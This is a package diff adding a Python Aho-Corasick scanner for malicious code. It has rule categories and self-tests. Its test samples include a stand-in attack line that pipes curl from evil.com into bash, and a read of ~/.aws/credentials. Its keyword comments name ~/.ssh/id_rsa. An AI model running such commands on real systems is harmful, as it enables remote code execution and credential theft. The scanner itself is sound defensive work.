caidongyun 6.1.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,520 @@
1
+ #!/usr/bin/env python3
2
+ """
3
+ Aho-Corasick 扫描器 - 真正的 O(n) 多模式匹配
4
+
5
+ 核心思想:
6
+ - 将所有规则的关键词整合到一个自动机
7
+ - 一次遍历文本,匹配所有规则
8
+ - 时间复杂度:O(n),与规则数无关
9
+ """
10
+
11
+ import ahocorasick
12
+ import re
13
+ import time
14
+ import json
15
+ from pathlib import Path
16
+ from typing import Dict, List, Set, Tuple
17
+ from dataclasses import dataclass
18
+
19
+
20
@dataclass()
class ScanMatch:
    """A single rule hit reported by the scanner.

    Positional field order: rule_id, name, category, confidence, severity,
    pattern, match_text, position.
    """

    rule_id: str     # id of the rule that fired
    name: str        # human-readable rule name
    category: str    # rule category label
    confidence: int  # confidence value copied from the rule
    severity: str    # severity label copied from the rule
    pattern: str     # pattern associated with the hit
    match_text: str  # matched text, or a summary when not regex-verified
    position: int    # start offset of the match in the scanned text
31
+
32
+
33
+ class AhoCorasickScanner:
34
+ """
35
+ Aho-Corasick 扫描器
36
+
37
+ 将所有规则整合到一个自动机,一次扫描 O(n)
38
+ """
39
+
40
+ # 高风险规则类别(必须 Regex 验证,不能误报)
41
+ HIGH_RISK_CATEGORIES = {
42
+ 'credential_theft', # 凭据窃取
43
+ 'credential_harvesting', # 凭据收集
44
+ 'data_exfiltration', # 数据外传
45
+ 'command_injection', # 命令注入
46
+ 'remote_code_execution', # 远程代码执行
47
+ 'supply_chain_attack', # 供应链攻击
48
+ 'arbitrary_code_execution', # 任意代码执行
49
+ 'privilege_escalation', # 权限提升
50
+ # AI/LLM 攻击
51
+ 'jailbreak', # LLM 越狱
52
+ 'prompt_injection', # 提示注入
53
+ 'model_poisoning', # 模型投毒
54
+ 'rag_poisoning', # RAG 投毒
55
+ 'model_extraction', # 模型提取
56
+ 'model_backdoor', # 模型后门
57
+ 'model_inversion', # 模型反演
58
+ 'ai_supply_chain', # AI 供应链
59
+ 'ai_resource_abuse', # AI 资源滥用
60
+ 'adversarial_examples', # 对抗样本
61
+ }
62
+
63
+ def __init__(self, rules_file: Path):
64
+ """
65
+ 初始化扫描器
66
+
67
+ Args:
68
+ rules_file: 规则文件路径(JSON 格式)
69
+ """
70
+ self.rules_file = rules_file
71
+ self.rules = []
72
+ self.automaton = None
73
+ self.compiled_patterns = {} # 缓存编译后的 regex
74
+ self._rule_categories = {} # 缓存规则类别
75
+ self.rule_map = {} # rule_id → rule 映射
76
+
77
+ print("🔧 初始化 Aho-Corasick 扫描器...")
78
+ self._load_rules()
79
+ self._load_rule_categories() # 加载规则类别(用于高风险检测)
80
+ self._build_automaton()
81
+ self._compile_patterns()
82
+ print(f"✅ 初始化完成 (高风险类别:{len(self.HIGH_RISK_CATEGORIES)})")
83
+
84
+ def _load_rules(self):
85
+ """加载规则文件"""
86
+ with open(self.rules_file, 'r', encoding='utf-8') as f:
87
+ data = json.load(f)
88
+
89
+ self.rules = data.get('rules', [])
90
+
91
+ # 构建 rule_id → rule 映射
92
+ for rule in self.rules:
93
+ rule_id = rule.get('id', f'RULE-{len(self.rule_map)}')
94
+ self.rule_map[rule_id] = rule
95
+
96
+ print(f"✅ 加载 {len(self.rules)} 条规则")
97
+
98
+ def _extract_keywords(self, pattern: str) -> List[str]:
99
+ """
100
+ 从 regex pattern 提取精确关键词
101
+
102
+ 策略:
103
+ 1. 提取明显的字符串字面量(非 regex 元字符)
104
+ 2. 保留关键操作符(如 | 管道)
105
+ 3. 保留特殊字符组合(如 .aws/, ~/.ssh)
106
+ 4. 过滤太短的词(<3 字符)
107
+
108
+ Args:
109
+ pattern: 正则表达式
110
+
111
+ Returns:
112
+ 关键词列表
113
+ """
114
+ keywords = []
115
+
116
+ # 策略 1: 提取包含特殊字符的关键词(高区分度)
117
+ special_patterns = [
118
+ r'([a-zA-Z0-9_]+\|[a-zA-Z0-9_]+)', # curl|bash
119
+ r'([a-zA-Z0-9_]+\.[a-zA-Z0-9_]+)', # os.system
120
+ r'(\.[a-zA-Z0-9_]+/[a-zA-Z0-9_]+)', # .aws/credentials
121
+ r'(\~[a-zA-Z0-9_./]+)', # ~/.ssh/id_rsa
122
+ r'([a-zA-Z0-9_]+\([^)]*\))', # system(
123
+ ]
124
+
125
+ for sp in special_patterns:
126
+ matches = re.findall(sp, pattern)
127
+ keywords.extend(matches)
128
+
129
+ # 策略 2: 提取普通关键词(长度>=3)
130
+ words = re.findall(r'[a-zA-Z0-9_]{3,}', pattern)
131
+
132
+ # 过滤常见词
133
+ common_words = {
134
+ 'the', 'and', 'for', 'not', 'with', 'from', 'import',
135
+ 'def', 'return', 'if', 'else', 'elif', 'while', 'for',
136
+ 'true', 'false', 'none', 'null', 'undefined',
137
+ 'com', 'org', 'net', 'http', 'https', 'www'
138
+ }
139
+ words = [w for w in words if w.lower() not in common_words]
140
+
141
+ keywords.extend(words[:10]) # 限制每规则最多 10 个关键词
142
+
143
+ # 去重
144
+ return list(set(keywords))
145
+
146
+ def _build_automaton(self):
147
+ """构建 Aho-Corasick 自动机"""
148
+ print("🔧 构建 Aho-Corasick 自动机...")
149
+ start = time.time()
150
+
151
+ self.automaton = ahocorasick.Automaton()
152
+
153
+ total_keywords = 0
154
+ for rule in self.rules:
155
+ rule_id = rule.get('id', f'RULE-{total_keywords}')
156
+ patterns = rule.get('patterns', [])
157
+
158
+ for pattern in patterns:
159
+ # 提取关键词
160
+ keywords = self._extract_keywords(pattern)
161
+
162
+ for keyword in keywords:
163
+ # 添加关键词到自动机,关联 rule_id 和 pattern
164
+ # 格式:(keyword, (rule_id, pattern))
165
+ self.automaton.add_word(
166
+ keyword.lower(),
167
+ (rule_id, pattern)
168
+ )
169
+ total_keywords += 1
170
+
171
+ # 构建自动机(构建失败函数)
172
+ self.automaton.make_automaton()
173
+
174
+ elapsed = (time.time() - start) * 1000
175
+ print(f"✅ 自动机构建完成 ({elapsed:.1f}ms)")
176
+ print(f" 关键词数:{total_keywords}")
177
+ print(f" 自动机大小:{len(self.automaton)}")
178
+
179
+ def _compile_patterns(self):
180
+ """预编译所有规则的 regex(缓存)"""
181
+ print("🔧 预编译正则表达式...")
182
+ start = time.time()
183
+
184
+ for rule in self.rules:
185
+ rule_id = rule.get('id', '')
186
+ patterns = rule.get('patterns', [])
187
+
188
+ compiled = []
189
+ for pattern in patterns:
190
+ try:
191
+ compiled.append(re.compile(pattern, re.IGNORECASE))
192
+ except re.error:
193
+ pass # 忽略无效的正则
194
+
195
+ self.compiled_patterns[rule_id] = compiled
196
+
197
+ elapsed = (time.time() - start) * 1000
198
+ print(f"✅ 预编译完成 ({elapsed:.1f}ms)")
199
+
200
+ def scan(self, content: str, skip_regex_verify: bool = False) -> Dict:
201
+ """
202
+ 扫描内容(Aho-Corasick 一次遍历 + 分层验证)
203
+
204
+ 分层策略:
205
+ 1. AC 自动机扫描(必做,0.1ms)
206
+ 2. 智能决策是否 Regex 验证:
207
+ - 文件<200 字 → 验证(避免误报)
208
+ - 候选≤3 个 → 验证(成本低)
209
+ - 高风险规则 → 验证(不能误报)
210
+ - 其他 → 直接 AC 结果(快速)
211
+
212
+ Args:
213
+ content: 待扫描内容
214
+ skip_regex_verify: 跳过 regex 验证(用于大文本,提升速度)
215
+
216
+ Returns:
217
+ 扫描结果字典
218
+ """
219
+ start = time.time()
220
+
221
+ # Step 1: Aho-Corasick 一次遍历,返回候选规则(必做)
222
+ candidate_rules = self._automaton_scan(content)
223
+
224
+ # 无匹配,直接返回
225
+ if not candidate_rules:
226
+ return {
227
+ 'hit_count': 0,
228
+ 'matches': [],
229
+ 'candidate_count': 0,
230
+ 'scan_time_ms': (time.time() - start) * 1000
231
+ }
232
+
233
+ # Step 2: 智能决策是否验证
234
+ should_verify = False
235
+
236
+ # 条件 1: 文件太小(<200 字),容易误报
237
+ if len(content) < 200:
238
+ should_verify = True
239
+
240
+ # 条件 2: 候选很少(≤3 个),验证成本低
241
+ elif len(candidate_rules) <= 3:
242
+ should_verify = True
243
+
244
+ # 条件 3: 高风险规则,不能误报
245
+ elif self._is_high_risk(candidate_rules):
246
+ should_verify = True
247
+
248
+ # 条件 4: 用户强制跳过
249
+ elif skip_regex_verify or len(content) > 5000:
250
+ should_verify = False
251
+
252
+ # 执行验证决策
253
+ if should_verify:
254
+ # Regex 验证(精确,10ms)
255
+ matches = self._regex_verify(content, candidate_rules)
256
+ else:
257
+ # 直接 AC 结果(快速,0.5ms)
258
+ matches = self._automaton_to_matches(candidate_rules)
259
+
260
+ elapsed = (time.time() - start) * 1000
261
+
262
+ return {
263
+ 'hit_count': len(matches),
264
+ 'matches': matches,
265
+ 'candidate_count': len(candidate_rules),
266
+ 'scan_time_ms': elapsed,
267
+ 'verified': should_verify # 记录是否验证
268
+ }
269
+
270
+ def _load_rule_categories(self):
271
+ """
272
+ 加载规则类别(用于高风险检测)
273
+ """
274
+ if not self.rules_file.exists():
275
+ return
276
+
277
+ try:
278
+ with open(self.rules_file, 'r', encoding='utf-8') as f:
279
+ rules_data = json.load(f)
280
+
281
+ for rule in rules_data.get('rules', []):
282
+ rule_id = rule.get('id', '')
283
+ category = rule.get('category', 'unknown')
284
+ self._rule_categories[rule_id] = category
285
+ except Exception as e:
286
+ print(f"⚠️ 加载规则类别失败:{e}", file=sys.stderr)
287
+
288
+ def _is_high_risk(self, candidate_rules: Dict[str, List[str]]) -> bool:
289
+ """
290
+ 检查是否有高风险规则
291
+
292
+ Args:
293
+ candidate_rules: 候选规则 {rule_id: [patterns]}
294
+
295
+ Returns:
296
+ True 如果有高风险规则
297
+ """
298
+ for rule_id in candidate_rules.keys():
299
+ category = self._rule_categories.get(rule_id, 'unknown')
300
+ if category in self.HIGH_RISK_CATEGORIES:
301
+ return True
302
+ return False
303
+
304
+ def _automaton_scan(self, content: str) -> Dict[str, List[str]]:
305
+ """
306
+ Aho-Corasick 扫描
307
+
308
+ Args:
309
+ content: 待扫描内容
310
+
311
+ Returns:
312
+ {rule_id: [pattern1, pattern2, ...]}
313
+ """
314
+ candidates = {}
315
+ content_lower = content.lower()
316
+
317
+ # 一次遍历!O(n)
318
+ for end_idx, (rule_id, pattern) in self.automaton.iter(content_lower):
319
+ if rule_id not in candidates:
320
+ candidates[rule_id] = []
321
+ if pattern not in candidates[rule_id]:
322
+ candidates[rule_id].append(pattern)
323
+
324
+ return candidates
325
+
326
+ def _automaton_to_matches(self, candidate_rules: Dict[str, List[str]]) -> List[ScanMatch]:
327
+ """
328
+ 将 Aho-Corasick 结果转换为 ScanMatch(不验证 regex)
329
+
330
+ Args:
331
+ candidate_rules: 候选规则 {rule_id: [patterns]}
332
+
333
+ Returns:
334
+ 匹配结果列表
335
+ """
336
+ matches = []
337
+
338
+ for rule_id, patterns in candidate_rules.items():
339
+ rule = self.rule_map.get(rule_id)
340
+ if not rule:
341
+ continue
342
+
343
+ matches.append(ScanMatch(
344
+ rule_id=rule_id,
345
+ name=rule.get('name', 'Unknown'),
346
+ category=rule.get('category', 'unknown'),
347
+ confidence=rule.get('confidence', 80),
348
+ severity=rule.get('severity', 'MEDIUM'),
349
+ pattern=patterns[0] if patterns else '',
350
+ match_text=f'AC match: {len(patterns)} patterns',
351
+ position=0
352
+ ))
353
+
354
+ return matches
355
+
356
+ def _regex_verify(self, content: str, candidate_rules: Dict[str, List[str]]) -> List[ScanMatch]:
357
+ """
358
+ Regex 验证
359
+
360
+ Args:
361
+ content: 待扫描内容
362
+ candidate_rules: 候选规则 {rule_id: [patterns]}
363
+
364
+ Returns:
365
+ 匹配结果列表
366
+ """
367
+ matches = []
368
+
369
+ for rule_id, patterns in candidate_rules.items():
370
+ rule = self.rule_map.get(rule_id)
371
+ if not rule:
372
+ continue
373
+
374
+ # 使用预编译的 regex 验证
375
+ compiled_list = self.compiled_patterns.get(rule_id, [])
376
+
377
+ for compiled in compiled_list:
378
+ match_obj = compiled.search(content)
379
+ if match_obj:
380
+ matches.append(ScanMatch(
381
+ rule_id=rule_id,
382
+ name=rule.get('name', 'Unknown'),
383
+ category=rule.get('category', 'unknown'),
384
+ confidence=rule.get('confidence', 80),
385
+ severity=rule.get('severity', 'MEDIUM'),
386
+ pattern=compiled.pattern,
387
+ match_text=match_obj.group(0)[:100],
388
+ position=match_obj.start()
389
+ ))
390
+ break # 每条规则只报告一次
391
+
392
+ return matches
393
+
394
+ def get_stats(self) -> Dict:
395
+ """获取统计信息"""
396
+ return {
397
+ 'total_rules': len(self.rules),
398
+ 'automaton_size': len(self.automaton),
399
+ 'cached_patterns': len(self.compiled_patterns)
400
+ }
401
+
402
+
403
def run_unit_tests():
    """Run the built-in smoke tests (5 samples) and a small throughput benchmark.

    Rules are loaded from ``rules/dist/all_rules.json`` three directories above
    this file; if that file is missing, an error is printed and nothing runs.
    Results are printed only; nothing is returned.
    """
    print("=" * 70)
    print("Aho-Corasick 扫描器单元测试")
    print("=" * 70)

    rules_file = Path(__file__).parent.parent.parent / 'rules' / 'dist' / 'all_rules.json'
    if not rules_file.exists():
        print(f"❌ 规则文件不存在:{rules_file}")
        return

    scanner = AhoCorasickScanner(rules_file)

    # A malicious sample passes if at least one expected category is detected;
    # a benign sample (empty 'expected') passes with at most 2 hits.
    test_samples = [
        # Malicious samples
        {
            'name': 'supply_chain_attack',
            'content': "os.system('curl http://evil.com | bash')",
            'expected': ['supply_chain_attack', 'privilege_escalation'],
        },
        {
            'name': 'credential_theft',
            'content': "with open('~/.aws/credentials') as f: key = f.read()",
            'expected': ['credential_theft', 'credential_harvesting'],
        },
        {
            'name': 'code_execution',
            'content': "exec(user_input)\nos.system(cmd)",
            # 'arbitrary_code_execution' is the category name used in
            # HIGH_RISK_CATEGORIES; the legacy 'arbitrary_execution' is kept.
            'expected': ['arbitrary_execution', 'arbitrary_code_execution',
                         'privilege_escalation'],
        },
        # Benign samples
        {
            'name': 'benign_python',
            'content': """
#!/usr/bin/env python3
def calculate_sum(numbers):
return sum(numbers)

if __name__ == '__main__':
print(calculate_sum([1, 2, 3]))
""",
            'expected': [],
        },
        {
            'name': 'benign_bash',
            'content': """#!/bin/bash
echo "Hello World"
ls -la
pwd
""",
            'expected': [],
        },
    ]

    print("\n🧪 运行单元测试...")
    passed = 0
    failed = 0
    total_samples = len(test_samples)

    for i, sample in enumerate(test_samples, 1):
        result = scanner.scan(sample['content'])
        detected_categories = {m.category for m in result['matches']}
        expected_categories = set(sample['expected'])

        if expected_categories:
            success = bool(detected_categories & expected_categories)
        else:
            success = result['hit_count'] <= 2

        if success:
            print(f"✅ [{i}/{total_samples}] {sample['name']}: PASS")
            print(f" 检测:{result['hit_count']} 个匹配,耗时:{result['scan_time_ms']:.2f}ms")
            passed += 1
        else:
            print(f"❌ [{i}/{total_samples}] {sample['name']}: FAIL")
            print(f" 预期:{expected_categories}")
            print(f" 检测:{detected_categories}")
            failed += 1

    # Throughput benchmark on random text.
    print("\n⚡ 性能测试...")
    import random
    import string

    rng = random.Random(0)  # fixed seed so benchmark input is reproducible
    alphabet = string.ascii_letters + string.digits + ' \n'
    for size in (100, 1000, 10000):
        content = ''.join(rng.choices(alphabet, k=size))

        # Average over several runs.
        times = [scanner.scan(content)['scan_time_ms'] for _ in range(10)]
        avg_time = sum(times) / len(times)
        # A coarse clock can report 0 ms for tiny inputs; avoid ZeroDivisionError.
        throughput = f"{size / avg_time:.0f}" if avg_time > 0 else "∞"
        print(f" {size:5d} 字符:{avg_time:6.2f}ms ({throughput} chars/ms)")

    total = passed + failed
    pass_rate = passed / total * 100 if total else 0.0
    print("\n" + "=" * 70)
    print(f"测试结果:{passed} 通过,{failed} 失败")
    print(f"通过率:{pass_rate:.1f}%")
    print("=" * 70)

    stats = scanner.get_stats()
    print("\n📊 扫描器统计:")
    print(f" 规则数:{stats['total_rules']}")
    print(f" 自动机大小:{stats['automaton_size']}")
    print(f" 缓存 patterns: {stats['cached_patterns']}")
517
+
518
+
519
if __name__ == "__main__":
    # Script entry point: run the built-in self-test and benchmark.
    run_unit_tests()